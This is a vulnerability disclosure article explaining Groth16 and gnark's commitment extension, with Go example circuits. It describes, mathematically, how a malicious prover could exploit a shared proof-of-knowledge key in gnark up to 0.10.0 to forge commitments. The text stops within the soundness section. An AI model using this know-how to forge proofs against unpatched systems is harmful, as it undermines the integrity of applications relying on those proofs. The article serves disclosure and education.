Skip to main content
Malte Leip

Two Vulnerabilities in gnark's Groth16 Proofs

An analysis of two vulnerabilities Zellic discovered that broke zero-knowledge and soundness of gnark’s Groth16 proofs with commitments
Article heading

gnark is a popular zkSNARK library written in Go. One of two proving schemes offered by the gnark backend is a variant of the Groth16 scheme. This variant used by gnark is a modification of standard Groth16, extending it with commitments. In this article, we discuss two vulnerabilities that we found in this extension. The first breaks soundness and could allow a malicious prover to prove incorrect statements, whenever at least two commitments are used (CVE-2024-45039). The second breaks the zero-knowledge property of Groth16 proofs produced by gnark using commitments (CVE-2024-45040). In some cases, an attacker could use this vulnerability to recover private witnesses from a proof. We reported both vulnerabilities to the gnark team, and they have been fixed in version 0.11.0. Unless otherwise stated, the discussion below is based on gnark version 0.10.0.

This article will begin in the first two sections by introducing gnark and fixing notation as well as recalling the main components of the Groth16 proving system. In the third section, we then motivate and describe gnark’s extension to Groth16 involving commitments. Building from there, the fourth section explains the first of two vulnerabilities, the soundness one. Before explaining the second vulnerability in the sixth section, we take a step back and discuss commitment schemes and their security properties, particularly for Pedersen commitments. We provide some background on how we found the vulnerabilities as well as a timeline at the end.

What Is gnark?

In this section, we will introduce gnark and its components via an example, assuming the reader already has basic familiarity with what zero-knowledge proofs are. (If you need an introduction to that first, check out our earlier blog post on an introduction to zero-knowledge.)

Circuit Variables and Constraints

There are several parts involved in producing ZK proofs. The very first step is to define what it is we would like to prove. As an example, let us say we want to prove that a public natural number NN is not prime. Even more, we would like to prove that we actually know 1<A,B1 < A, B so that N=ABN = A\cdot B. Given this specification, we then need to define a circuit consisting of circuit variables that could be private witnesses or public instances, together with constraints that these circuit variables need to satisfy. Defining a circuit like this is functionality offered by gnark’s front end. Here is how this could look for our example so far:

// Here we define which circuit variables our circuit will have.
type ExampleCircuit struct {
A frontend.Variable // Private witness
B frontend.Variable // Private witness
N frontend.Variable `gnark:",public"` // Public instance
}

// This function defines the constraints for our circuit
func (circuit *ExampleCircuit) Define(api frontend.API) error {
api.AssertIsEqual(circuit.N, api.Mul(circuit.A, circuit.B)) // N = A*B
api.AssertIsDifferent(circuit.A, 0) // A != 0
api.AssertIsDifferent(circuit.A, 1) // A != 1
api.AssertIsDifferent(circuit.B, 0) // B != 0
api.AssertIsDifferent(circuit.B, 1) // B != 1
return nil
}

We first defined three circuit variables AA, BB, and NN, making NN public. By default, circuit variables in gnark are private witnesses. The function Define is then used to introduce constraints. In this case, we constrained N=ABN = A \cdot B as well as ruled out that AA or BB were 0 or 1.

Arithmetic Modulo pp

This is not enough to actually ensure our statement, however. While in our original statement NN, AA, and BB were natural numbers, in the circuit we are actually working with elements of a prime field, so integers modulo a prime pp. The constraint we introduced only ensures that NN and ABA\cdot B have the same remainder when reduced modulo pp. So how do we deal with that? One way would be to constrain AA and BB to be small enough that their product can never be as large as pp. For example, if we only plan to use this circuit for NN, which is at most a 16-bit number, then correct AA and BB will also be at most 16 bits wide. The pp we will later use will be a 254-bit number, so constraining AA and BB to be at most 16 bits wide will ensure that no wraparound can happen on multiplication.

Range Checks

So how do we actually constrain AA and BB to be at most 16 bits wide? Checks like this are called range checks and are very common when writing circuits. Because of this, gnark’s standard library already contains an optimized implementation of range checks already, which we can use without needing to implement the logic for this ourselves:

const bitnum = 8

// This function defines the constraints for our circuit
func (circuit *ExampleCircuit) Define(api frontend.API) error {
api.AssertIsEqual(circuit.N, api.Mul(circuit.A, circuit.B)) // N = A*B
api.AssertIsDifferent(circuit.A, 0) // A != 0
api.AssertIsDifferent(circuit.A, 1) // A != 1
api.AssertIsDifferent(circuit.B, 0) // B != 0
api.AssertIsDifferent(circuit.B, 1) // B != 1
rangeChecker := rangecheck.New(api)
rangeChecker.Check(circuit.A, bitnum) // 0 <= A < 2^bitnum
rangeChecker.Check(circuit.B, bitnum) // 0 <= B < 2^bitnum
return nil
}

Proving Scheme

If we want to use gnark to produce proofs for this circuit, we first need to decide on the proving scheme and elliptic curve we would like to use. There are two proving schemes available: PlonK and (a variant of) Groth16. In this article, we only consider Groth16. There are also multiple curves available, and we choose the BN254 curve in our examples.

Running Setup, Prover, and Verifier

Before we can produce an actual Groth16 proof for the above circuit, we must first run the setup, producing a proving key and verification key. The proving key will then be used by the prover along the public instances and private witnesses to produce the proof, and the verfication key will be used by the verifier together with the public instances and the proof to verify whether the proof is valid. The code for this looks as follows:

func main() {
// Compiles our circuit into a R1CS constraint system
var circuit ExampleCircuit
ccs, _ := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circuit)

// Groth16 setup, generating the proving key and verification key
pk, vk, _ := groth16.Setup(ccs)

// Witness definition
assignment := ExampleCircuit{A: 3, B: 10, N: 30}
witness, _ := frontend.NewWitness(&assignment, ecc.BN254.ScalarField())
publicInstances, _ := witness.Public()

// Proving
proof, _ := groth16.Prove(ccs, pk, witness)

// Verifying
groth16.Verify(proof, vk, publicInstances)
}

If we run this, we will get output like the following, showing the proof was successfully produced and verified:

19:32:11 INF compiling circuit
19:32:11 INF parsed circuit inputs nbPublic=1 nbSecret=2
19:32:11 INF building constraint builder nbConstraints=29
19:32:11 DBG constraint system solver done nbConstraints=29 took=0.698133
19:32:11 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=29 took=2.139242
19:32:11 DBG verifier done backend=groth16 curve=bn254 took=3.499106

The Zero-Knowledge Property

The zero-knowledge property means in this example that knowing only the public instance NN and the proof (as well as the verification and proving keys), it should be impossible to recover any knowledge about AA and BB apart from what is constrained in the circuit. In the example N=30N=30, there are six nontrivial divisors of NN, namely 2,3,5,6,102,3,5,6,10, and 1515. Possibilities for (A,B)(A, B) are thus (2,15),(3,10),(5,6),(6,5),(10,3)(2, 15), (3, 10), (5, 6), (6, 5), (10, 3), and (15,2)(15, 2). There should be no way to check which of these the prover actually used. As we will later see, a vulnerability in the extension to Groth16 that was used by gnark meant that this was violated and it was in fact possible to recover what AA and BB were (up to version 0.10.0, fixed in version 0.11.0).

Groth16 Proofs

Before we can discuss gnark’s extension to Groth16, we first briefly review how proofs for the original variant of Groth16 are constructed and verified. The Groth16 proving system was introduced in the paper “On the Size of Pairing-based Non-interactive Arguments” by Jens Groth, and the following summary closely follows section 3.2 of that paper.

For readers already familiar with the Groth16 proving system, the purpose of this section is mainly to fix notation and provide the relevant formulas that we will use throught the article for reference. For readers that are not familiar with the details of Groth16, the main takeaways are the following:

  • The circuit variables are a1,,ama_1, \dots, a_m, with a1,,aa_1,\dots, a_\ell the public inputs, and a+1,,ama_{\ell+1}, \dots, a_m private witnesses.
  • Out of the constraints of the circuit, a black-box setup process spits out a bunch of elliptic curve points that we give names like LiL_i or α\alpha. A list can be found in the table below.
  • A proof consists of three elliptic curve points AA, BB', and CC, and there are formulas for how they are to be calculated by the prover from the points obtained from the setup step and from some hih_i that we treat as a black box for the purpose of this article. Why the formulas for these three points look the way they do is not relevant for this article, but we state the formulas because we will modify them later, when discussing gnark’s extension.
  • There is an equation, given in the “Verifying” section below, that is checked by the verifier. The verifier accepts a proof if and only if the equation holds. Again, why this equation looks the way it does can be taken as given, but we state the equation as it will be modified later.
  • Soundness of the Groth16 proving system means that if this equation holds, then the prover must have known witnesses satisfying the circuit constraints.

Setup

There are three main parts that together make up the Groth16 proving system: the setup, the prover, and the verifier. The setup depends on the circuit and produces a proving key and a verifying key, where the former is used by the prover together with an assignement for the circuit variables to produce a proof, and the latter is used by the verifier together with the public instances to check validity of a proof.

The table below describes the data that make up the proving and verifying keys. We give both the notation used in the Groth16 paper as well as the notation used in the gnark source code. We also fix notation we will use below. In the group column, we specify which group the element is an element of, either G1\mathbb{G}_1 or G2\mathbb{G}_2. Those two abelian groups are subgroups of elliptic curves and come together with a suitable pairing e ⁣:G1×G2GTe\colon\mathbb{G}_1 \times \mathbb{G}_2 \to \mathbb{G}_T. For readers who would like an introduction, we have an earlier article introducing what elliptic curve pairings are. The precise ranges for ii in the various rows, how ui,vi,wiu_i, v_i, w_i relate to the circuit, and so on is not relevant for our exposition, so we will not go into those questions. The interested reader can find the details in the Groth16 paper. The constant \ell stands for the number of public instances. The notation [x]k\left[x\right]_k refers to xGkx\cdot G_k, where xx is an element of the scalar field and GkG_k is a fixed generator for Gk\mathbb{G}_k.

GroupNotation in this articleNotation in gnarkNotation in Groth16
Proving keyG1\mathbb{G}_1α=[α]1\overline{\alpha} = \left[\alpha\right]_1G1.Alpha[α]1\left[\alpha\right]_1
β=[β]1\overline{\beta} = \left[\beta\right]_1G1.Beta[β]1\left[\beta\right]_1
δ=[δ]1\overline{\delta} = \left[\delta\right]_1G1.Delta[δ]1\left[\delta\right]_1
AiA_iG1.A[i][ui(x)]1\left[u_i(x)\right]_1
BiB_iG1.B[i][vi(x)]1\left[v_i(x)\right]_1
ZiZ_iG1.Z[i][xit(x)δ]1\left[\frac{x^i t(x)}{\delta}\right]_1
Ki++1K_{i+\ell+1}G1.K[i][βui++1(x)+αvi++1(x)+wi++1(x)δ]1\left[\frac{\beta u_{i+\ell+1}(x) + \alpha v_{i+\ell+1}(x) + w_{i+\ell+1}(x)}{\delta}\right]_1
G2\mathbb{G}_2β=[β]2\overline{\beta}' = \left[\beta\right]_2G2.Beta[β]2\left[\beta\right]_2
δ=[δ]2\overline{\delta}' = \left[\delta\right]_2G2.Delta[δ]2\left[\delta\right]_2
BiB'_iG2.B[i][vi(x)]2\left[v_i(x)\right]_2
Verifying keyG1\mathbb{G}_1α=[α]1\overline{\alpha} = \left[\alpha\right]_1G1.Alpha[α]1\left[\alpha\right]_1
β=[β]1\overline{\beta} = \left[\beta\right]_1G1.Beta[β]1\left[\beta\right]_1
δ=[δ]1\overline{\delta} = \left[\delta\right]_1G1.Delta[δ]1\left[\delta\right]_1
LiL_iG1.K[i][βui(x)+αvi(x)+wi(x)γ]1\left[\frac{\beta u_{i}(x) + \alpha v_{i}(x) + w_{i}(x)}{\gamma}\right]_1
G2\mathbb{G}_2β=[β]2\overline{\beta}' = \left[\beta\right]_2G2.Beta[β]2\left[\beta\right]_2
δ=[δ]2\overline{\delta}' = \left[\delta\right]_2G2.Delta[δ]2\left[\delta\right]_2
γ=[γ]2\overline{\gamma}' = \left[\gamma\right]_2G2.Gamma[γ]2\left[\gamma\right]_2

Proving

The prover takes as input the proving key and an assignment for the circuit variables (a1,,am)\left(a_1, \dots, a_m\right). Here, a1a_1 through aa_\ell are the public instances and a+1a_{\ell+1} through ama_{m} are the private witnesses. To simplify notation, we also set a0=1a_0=1.

The prover then calculates three group elements (two of G1\mathbb{G}_1 and one of G2\mathbb{G}_2), which jointly make up the proof. Below we again compare notation for the elements that make up the proof.

GroupNotation in this articleNotation in gnarkNotation in Groth16
G1\mathbb{G}_1AAAr[A]1\left[A\right]_1
G2\mathbb{G}_2BB'Bs[B]1\left[B\right]_1
G1\mathbb{G}_1CCKrs[C]1\left[C\right]_1

To calculate AA, BB', and CC, the prover will first sample random elements rr and ss of the scalar field and calculate certain elements hih_i. (The details of this are not relevant for this article.) The proof points are then obtained as follows (nn can be thought of as the number of constraints in the circuit).

A=α+i=0maiAi+rδB=β+i=0maiBi+sδB=β+i=0maiBi+sδC=i=+1maiKi+i=0n2hiZi+sA+rB(rs)δ\begin{align*} A &= \overline{\alpha} + \sum_{i=0}^{m} a_i \cdot A_i + r\cdot \overline{\delta} \\ B &= \overline{\beta} + \sum_{i=0}^{m} a_i \cdot B_i + s\cdot \overline{\delta} \\ B' &= \overline{\beta}' + \sum_{i=0}^{m} a_i \cdot B'_i + s\cdot \overline{\delta}' \\ C &= \sum_{i=\ell + 1}^{m} a_i\cdot K_i + \sum_{i=0}^{n-2} h_i \cdot Z_i + s\cdot A + r\cdot B - (r\cdot s)\cdot \overline{\delta} \end{align*}

Verifying

To verify a proof (A,B,C)\left(A, B', C\right) for public instances (a1,,a)\left(a_1, \dots, a_\ell\right), the verifier checks whether the following equality holds.

e(A,B)=e(α,β)+e(i=0aiLi,γ)+e(C,δ)\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C, \overline{\delta}'\right) \end{equation*}

gnark’s Extension to Groth16 Proofs

In this section, we will motivate and discuss the extension to Groth16 that is used by gnark.

Random Linear Combinations and the Schwartz-Zippel Lemma

To motivate the extension, let us first take a step back and consider a generic problem. In many situations where a prover wants to convince a verifier of some statements, this involves claims that a number of equalities fi=gif_i = g_i hold (fif_i and gig_i are elements of some finite field Fp\mathbb{F}_p and 0i<k0 \leq i < k). One way to check all equations at once is checking a random linear combination instead. If rir_i are random elements of Fp\mathbb{F}_p, then fi=gif_i = g_i for all ii implies that i=0k1rifi=i=0k1rigi\sum_{i=0}^{k-1} r_i \cdot f_i = \sum_{i=0}^{k-1} r_i \cdot g_i. On the other hand, if there is a jj such that xjyjx_j \neq y_j, then only one in pp of tuples (r1,,rn)\left(r_1, \dots, r_n\right) will satisfy i=0k1rifi=i=0k1rigi\sum_{i=0}^{k-1} r_i \cdot f_i = \sum_{i=0}^{k-1} r_i \cdot g_i.1 Thus, as long as the values rir_i are chosen uniformly random and independently of fif_i and gig_i, the equality i=0k1rifi=i=0k1rigi\sum_{i=0}^{k-1} r_i \cdot f_i = \sum_{i=0}^{k-1} r_i \cdot g_i can be taken to be very strong evidence that fi=gif_i = g_i for all ii.

In some situations, calculating the sums on both sides might be cheap, but each equality check is expensive, so paying for the reduction from nn to only a single equality check with the calculation of the two linear combinations can be an improvement.

A variant of the above method is often used in practice. We can interpret the elements fif_i and gig_i as the coefficients of polynomials ff and gg of degree kk. What we would like to show is that f=gf = g, or equivalently fg=0f-g = 0. As fgf-g is a polynomial of degree at most kk, it must either be the zero polynomial or have at most kk different roots. The probability of a random element τ\tau being a root of fgf-g, assuming that fg0f-g \neq 0, is thus at most k/pk / p, so tiny if pp is large compared to kk. This statement (generalized to the multivariate case) is known as the Schwartz-Zippel lemma. The upshot is that if ff and gg evaluate to the same element on a random input τ\tau, then this can be taken as strong evidence for f=gf=g. This is similar to the random linear combination check we discussed before, now using ri=τir_i = \tau^i.

Note that if τ\tau can be chosen by the prover, then they could just calculate a root of fgf-g, so this would be insecure. Similarly, if τ\tau is chosen randomly by the verifier, but the prover knows of τ\tau before deciding on fif_i and gig_i, they could cheat by, for example, setting f0=i=0k1giτii=1k1fiτif_0 = \sum_{i=0}^{k-1} g_i \cdot \tau^i - \sum_{i=1}^{k-1} f_i \cdot \tau^i.

The discussed technique is very widely used, and in fact, the Groth16 proof scheme itself uses it. Looking at the “Notation in Groth16” column in the table for the verification and proving keys above, xx plays the role of the random input, and uiu_i and so on are polynomials related to the circuit’s constraints, which get evaluated at xx in order to construct the proving and verifying key. The proof essentially consists of points obtained by evaluating three polynomials at xx. The argument for why the verifiers’ single equality check implies all constraints is precisely the argument that a polynomial of low degree evaluating to zero at a random point xx implies with high probability that the polynomial was already zero.

In Groth16’s case, the value of xx is not allowed to be known to the prover, as otherwise the system would be insecure, as previously discussed. Thus, the necessary values derived from xx are essentially hidden behind the elliptic curve discrete logarithm problem. (Knowing, for example, ui(x)G1u_i(x) \cdot G_1 and G1G_1, with G1G1G_1\in\mathbb{G}_1, it should be computationally infeasible to calculate ui(x)u_i(x).) While xx might be present during the setup process to calculate the proving and verifying key, the value of xx is so-called toxic waste; it must be deleted to ensure no prover will know it. In practice, multiparty computation is used in the setup phase to ensure that no single party ever knows toxic-waste values such as xx.

Given this is such a useful technique in many places, we might want to use it within a circuit as well. However, we run into a problem here. How do we obtain a random value within the circuit at proving time? We certainly cannot let the prover choose it, as that would be insecure and we want a noninteractive protocol, so there is no other party that could supply it. One thing we could do is to obtain τ\tau as a hash of fif_i and gig_i. Given a hash function that can be modeled as a random oracle, this would be secure as well. The malicious prover could now try again if the τ\tau they got is not a root, but as the new τ\tau obtained after modifying some fif_i and/or gig_i will be random and unrelated to previously seen values, the best they can do is brute-force.

This procedure allows us to use the technique of reducing checking many equalities to only checking one equality within circuits. However, we now have to compute a hash in circuit, which may be quite expensive itself. It would thus be very useful if a circuit variable could be somehow constrained to be a hash of some other circuit variables without actually having to add these constraints in circuit. This is exactly what the extension to Groth16 that is used by gnark does.

Splitting Out a Commitment

In order to have hashes of some circuit variables available in circuit, gnark allows to commit to collections of circuit variables. These commitments are elements of G1\mathbb{G}_1, and a hash calculated from them is added as additional public inputs to the circuit. There can be more than one commitment, and each commitment can be to one or more circuit variables, both public instances and private witnesses. In the following, we will, however, just describe the case where only private witnesses are commited to, to simplify notation.

How to design such a system? Merely committing to some values is easy, and there are many schemes that can be used to commit to values, such as the Pedersen commitment scheme, which we will discuss later in this article. So the prover could just, in addition to the normal Groth16 proof, also provide some commitments to some values. However, we do not want a Groth16 proof together with some unrelated commitments — we want the committed values to be the same values as the ones assigned to the circuit variables in the Groth16 proof. So there must be some linkage between the commitments and the (verification of) the Groth16 proof. This leads to the idea of starting by splitting off from one of the proof points of the summands concerning the circuit variables that are to be committed. This split-off point is then used as the commitment. But this point will also still need to be used in the verification equation, thereby linking it to the rest of the Groth16 proof.

Concretely, in the gnark extension, the commitment is removed from the CC proof point. This new point will then fill in for the missing part of CC in the proof verification. But as it is split off as a separate element, it can be used as input for hashing so that the verifier can compute that additional public input made up of the hashed commitment.

We will keep notation from before, so (a1,,am)\left(a_1, \dots, a_m\right) are the circuit variables, where a+1a_{\ell+1} through ama_m are the private witnesses. We assume we want to make kk-many commitments to pairwise disjoint subsets of the the private witnesses. For this, we introduce indexing sets J1,,Jk{+1,,m}\mathcal{J}_1, \dots, \mathcal{J}_k \subseteq \{\ell + 1, \dots, m\}. So the ii-th commitment should commit to circuit variables aja_{j} for jJij\in \mathcal{J}_i. We also introduce notation for the set of indexes of all committed circuit variables Ji=1kJi\mathcal{J} \coloneqq \bigcup\limits_{i=1}^{k} \mathcal{J}_i. What we can now do is replace the proof point CC from vanilla Groth16 (we will call the value this point has in vanilla Groth16 by ColdC_{\mathrm{old}} below for clarity) by a modified CnewC_{\mathrm{new}} and add new points D1,,DkD_1, \dots, D_k for the commitments.

Cold=i{+1,,m}aiKi+i=0n2hiZi+sA+rB(rs)δCnew=i{+1,,m}JaiKi+i=0n2hiZi+sA+rB(rs)δDi=jJiajKj\begin{align*} C_{\mathrm{old}} &= \sum_{i \in \{\ell+1, \dots, m\} } a_i\cdot K_i + \sum_{i=0}^{n-2} h_i \cdot Z_i + s\cdot A + r\cdot B - (r\cdot s)\cdot \overline{\delta} \\ C_{\mathrm{new}} &= \sum_{i \in \{\ell+1, \dots, m\} \setminus \mathcal{J} } a_i\cdot K_i + \sum_{i=0}^{n-2} h_i \cdot Z_i + s\cdot A + r\cdot B - (r\cdot s)\cdot \overline{\delta} \\ D_i &= \sum_{j \in \mathcal{J}_i } a_j\cdot K_j \end{align*}

Then the verifier can add the sum of the DiD_i to CC when checking the proof, so instead of

e(A,B)=e(α,β)+e(i=0aiLi,γ)+e(Cold,δ)\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C_{\mathrm{old}}, \overline{\delta}'\right) \end{equation*}

the check will be

e(A,B)=e(α,β)+e(i=0aiLi,γ)+e(Cnew+i=1kDi,δ)\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C_{\mathrm{new}} + \sum_{i=1}^k D_i, \overline{\delta}'\right) \end{equation*}

Now we have points DiD_i available that depend on the circuit variables committed to for the ii-th commitment. But the goal we outlined initially was that we wanted to have in-circuit challenges depending on those committed circuit variables, so we need one more step. Let H\mathcal{H} be a hash function that maps points of G1\mathbb{G}_1 to Fp\mathbb{F}_p. We can then use H\mathcal{H} to convert the commitment points to elements of Fp\mathbb{F}_p, which we then use as public inputs to the circuit:

ak1+iH(Di)\begin{equation*} a_{\ell-k-1+i} \coloneqq \mathcal{H}(D_i) \end{equation*}

Now these circuit variables ak1+ia_{\ell-k-1+i} can be used in circuit as challenges that depend on the circuit variables committed to with DiD_i, for example in Schwartz-Zippel–style equality checks, as discussed above.

As is, there would be a big problem for this scheme, however: the verification does not depend on CnewC_{\mathrm{new}} and all DiD_i individually, only on the sum Cnew+i=1kDiC_{\mathrm{new}} + \sum_{i=1}^k D_i. A malicious prover could thus just replace the honest DiD_i by arbitrarily chosen DifakeD_i^{\mathrm{fake}} by setting Cnewfake=Cnew+i=1kDii=1kDifakeC_{\mathrm{new}}^{\mathrm{fake}} = C_{\mathrm{new}} + \sum_{i=1}^k D_i - \sum_{i=1}^k D_i^{\mathrm{fake}}.

Preventing Fungibility of the Commitments Using Separate Proofs of Knowledge

So how could one prevent the kind of fungibility of the commitments that we just discussed?

The approach to this is to make the prover supply a proof of knowledge of coefficients aja_j for jJij \in \mathcal{J}_i so that Di=jJiajKjD_i = \sum_{j \in \mathcal{J}_i } a_j\cdot K_j. This would ensure that DiD_i is not fully arbitrary but was constructed as a linear combination of the expected points. (We will explain later how such a proof of knowledge would look like.) This helps but isn’t enough; a malicious prover could still, for example, use Di=0D_i=0 by just adding the relevant summands that should appear in the legitimate DiD_i to CnewC_{\mathrm{new}} instead. So we will also have to require a proof of knowledge of relevant coefficients for CnewC_{\mathrm{new}}, ensuring that CnewC_{\mathrm{new}} was constructed as a linear combination of only the expected elliptic curve points.

There is one optimization that we can do here to only need proofs of knowledge for DiD_i. Instead of pairing DiD_i with δ\overline{\delta}', grouping it with CnewC_{\mathrm{new}}, we could pair DD with γ\overline{\gamma}', so grouping it with i=0aiLi\sum_{i=0}^{\ell} a_i \cdot L_i. In this case, we do not need a proof of knowledge associated with i=0aiLi\sum_{i=0}^{\ell} a_i \cdot L_i for being of this form, because it is the verifier itself that computes this linear combination, and so by construction, it will be a linear combination of only points LiL_i with 0i0 \leq i \leq \ell. So we save one proof of knowledge. For this, we must slightly adjust DiD_i, however, so that we will have the following:

Di=δγ(jJiajKj)=jJiaj(δγKj)\begin{align*} D_i &= \frac{\delta}{\gamma} \cdot \left(\sum_{j \in \mathcal{J}_i } a_j\cdot K_j\right) = \sum_{j \in \mathcal{J}_i } a_j\cdot \left(\frac{\delta}{\gamma} \cdot K_j\right) \end{align*}

The prover should not know δ\delta, γ\gamma, or δγ\frac{\delta}{\gamma} of course, so the points δγKi\frac{\delta}{\gamma} \cdot K_i will be part of the proving key. We actually already have notation that we can use for δγKi\frac{\delta}{\gamma} \cdot K_i, namely LiL_i. In a vanilla Groth16 proving key, LiL_i does not appear, and the verification key has LjL_j for 0j0 \leq j \leq \ell. However, the formula for LiL_i is precisely what δγKi\frac{\delta}{\gamma} \cdot K_i is for i>i > \ell. Hence we can write DiD_i as follows:

Di=jJiajLj\begin{align*} D_i &= \sum_{j \in \mathcal{J}_i } a_j\cdot L_j \end{align*}

The verifier will now add DiD_i to the term from the public input when checking the proof, so it will check that

e(A,B)=e(α,β)+e(i=1kDi+i=0aiLi,γ)+e(Cnew,δ)\begin{equation*} e\left( A, B' \right) = e\left( \overline{\alpha}, \overline{\beta}' \right) + e\left( \sum_{i=1}^k D_i + \sum_{i=0}^{\ell} a_i \cdot L_i, \overline{\gamma}' \right) + e\left( C_{\mathrm{new}}, \overline{\delta}'\right) \end{equation*}

Assuming the protocol also includes proofs of knowledge for all DiD_i as mentioned before, showing that the resulting protocol is sound likely boils down to an argument similar to Theorem 1 of the Groth16 paper.

The extension used by gnark uses this solution. One of the two vulnerabilities we report on in this article relates to the way that the proofs of knowledge were batched, and we will explain how the proofs of knowledge coming with DiD_i work in the next section, where we will also explain the vulnerability.

The Soundness Vulnerability

In this section, we discuss the soundness vulnerability present in gnark up to version 0.10.0 in cases where more than one commitment is used. We will begin by explaining how proofs of knowledge associated to an individual commitment would look like, then explain how they can be batched, and finally discuss the even more compressed batched verification used by gnark up to version 0.10.0 that however resulted in a vulnerability.

Proofs of Knowledge of Coefficients of a Linear Combination

As explained before, we must require the prover to supply together with DiD_i a proof of knowledge of coefficients (aj)jJi(a_j)_{j\in\mathcal{J}_i} such that Di=jJiajLjD_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j. Such a proof of knowledge must be provided for 1ik1 \leq i \leq k. We will start by fixing ii and discuss how to construct a single such proof of knowledge.

This can be done as follows. During the setup phase, an additional toxic-waste field element σi\sigma_i is sampled, and σiLj\sigma_i\cdot L_j is added to the proving key for jJij\in\mathcal{J}_i. Furthermore, [σi]2G2[\sigma_i]_2 \in \mathbb{G}_2 is added to the verification key. The prover now provides together with DiD_i also a point PiP_i of G1\mathbb{G}_1, calculated as Pi=jJiaj(σiLj)P_i = \sum_{j \in \mathcal{J}_i } a_j\cdot (\sigma_i \cdot L_j). The verifier carries out the following check:

e(Di,[σi]2)=?e(Pi,[1]2)\begin{equation*} e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} e\left(P_i, [1]_2\right) \end{equation*}

Why should the above equality coinvince the verifier that DiD_i is of the form Di=jJiajLjD_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j? The idea is that the malicious prover could only have arranged this equality to hold if Pi=σiDiP_i = \sigma_i \cdot D_i, but as they do not know σi\sigma_i, the only way they could have managed this is by calculating DiD_i as a linear combination of points for which mulitplication by the scalar σi\sigma_i is already known. But the only points of that form are LjL_j for jJij\in\mathcal{J}_i.

Batching the Proofs of Knowledge

In the previous subsection, we discussed the kind of proof of knowledge needed for each commitment. Each of the verifications requires two pairings, which are quite expensive, however. So it would be good if verification of kk such proofs of knowledge could be done in fewer pairings than 2k2\cdot k many.

This is actually exactly the kind of situation we discussed initially in this article when motivating why in-circuit random challenges and hence commitments are useful: to be able to use Schwartz-Zippel–style compressed equality checks. This is precisely one example where the equality check is expensive, as it involves computing pairings.

Compressing this check in Schwartz-Zippel style thus begins by generating a random challenge rFpr\in\mathbb{F}_p. As this happens on the side of the verifier, they can just use a random number generator for this, if one is available. In contexts where the verifier can not use randomness, one may use r=H(D1,,Dk,P1,,Pk)r=\mathcal{H}(D_1,\dots, D_k, P_1, \dots, P_k). Then instead of verifying

e(Di,[σi]2)=?e(Pi,[1]2) for 1ik\begin{equation*} e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} e\left(P_i, [1]_2\right) \text{ for } 1 \leq i \leq k \end{equation*}

the verifier can instead verify

i=1krk1e(Di,[σi]2)=?i=1krk1e(Pi,[1]2)\begin{equation*} \sum_{i=1}^k r^{k-1}e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} \sum_{i=1}^k r^{k-1} e\left(P_i, [1]_2\right) \end{equation*}

So far nothing is won, as this still involves 2k2\cdot k pairings. However, the right-hand side can be rewritten to be calculated with a single pairing, using bilinearity of ee, which makes e(_,[1]2)e\left(\_, [1]_2\right) linear.

i=1krk1e(Pi,[1]2)=e(i=1krk1Pi,[1]2)\begin{equation*} \sum_{i=1}^k r^{k-1} e\left(P_i, [1]_2\right) = e\left(\sum_{i=1}^k r^{k-1}P_i, [1]_2\right) \end{equation*}

The upshot is that the verifier may verify the proofs of knowledge P1,,PkP_1, \dots, P_k by checking the following equality.

i=1krk1e(Di,[σi]2)=?e(i=1krk1Pi,[1]2)\begin{equation*} \sum_{i=1}^k r^{k-1}e\left(D_i, [\sigma_i]_2\right) \stackrel{?}{=} e\left(\sum_{i=1}^k r^{k-1}P_i, [1]_2\right) \end{equation*}

This requires k+1k+1 pairings.

Proofs of Knowledge for Commitments in gnark up to Version 0.10.0

To compress the equality check we just arrived at further, one would also like to use bilnearity on the left-hand side to move the sum into the inputs to the pairing, similarly to how it was done for the right-hand side. However, this is not possible, as neither of the two inputs is held constant across the sum, unless σi\sigma_i is independent of ii.

Up to version 0.10.0, gnark thus in fact used the same σi=σ\sigma_i = \sigma for each of the proofs of knowledge associated to the commitments. This meant that the verification could be compressed further, so that only two pairings were required:

e(i=1krk1Di,[σ]2)=?e(i=1krk1Pi,[1]2)\begin{equation*} e\left(\sum_{i=1}^k r^{k-1} D_i, [\sigma]_2\right) \stackrel{?}{=} e\left(\sum_{i=1}^k r^{k-1}P_i, [1]_2\right) \end{equation*}

The Soundness Vulnerability: Fungibility of Commitments

However, there is an issue with choosing the same σ\sigma for all the proofs of knowledge, as long as there is more than one. When we argued for why the check the verifier does should convince them that DiD_i is of the form Di=jJiajLjD_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j, we used that the only points of G1\mathbb{G}_1 for which the prover also knows their product with σi\sigma_i were LjL_j for jJij \in \mathcal{J}_i. However, if σ1==σk\sigma_1 = \cdots = \sigma_k, then LjL_j is such a point for ji=1kJij \in \bigcup\limits_{i=1}^{k}\mathcal{J}_i. Thus, the proofs of knowledge only convince the verifier that the prover knows al,ja_{l, j} so that Di=l=1kjJlal,jLjD_i = \sum_{l=1}^k \sum_{j \in \mathcal{J}_l } a_{l, j}\cdot L_j.

